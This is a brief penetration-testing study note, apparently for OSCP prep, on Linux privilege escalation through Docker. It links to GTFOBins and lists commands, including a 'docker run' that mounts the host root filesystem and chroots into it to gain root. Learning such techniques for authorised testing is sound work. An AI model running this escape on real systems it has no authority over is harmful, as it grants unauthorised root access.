// notes/ PrivEsc — Linux
🐧
Docker
{% embed url="<https://gtfobins.github.io/gtfobins/docker/" %}
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/docker ↗Docker
{% embed url="https://gtfobins.github.io/gtfobins/docker/" %}
code
01docker pscode
01docker run -v /:/mnt --rm -it bash chroot /mnt shcode
01docker-inspect {{.Config}} <id>